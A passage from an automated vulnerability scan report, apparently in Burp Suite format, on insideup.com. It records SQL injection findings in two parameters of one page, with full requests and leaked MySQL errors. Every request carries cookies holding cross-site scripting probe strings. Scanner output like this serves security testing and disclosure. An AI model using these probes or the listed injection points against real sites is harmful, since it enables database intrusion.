Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=c0t12d5kjudd5j2vuvjg1ecqa5; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.293. http://www.insideup.com/ppc/leadflow/fist00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:05:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3mbv1dgupoaab830a3vh5cpup4; path=/
Content-Length: 2222
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003'&iusrc=iups' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003''&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:05:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=a4s9n3p9i1pe30kodctbmi43g3; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/fist00/project.php was not found on this server.</p>

1.294. http://www.insideup.com/ppc/leadflow/fist00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:00:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=uu2ss4r791qve09per6vl34ng2; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
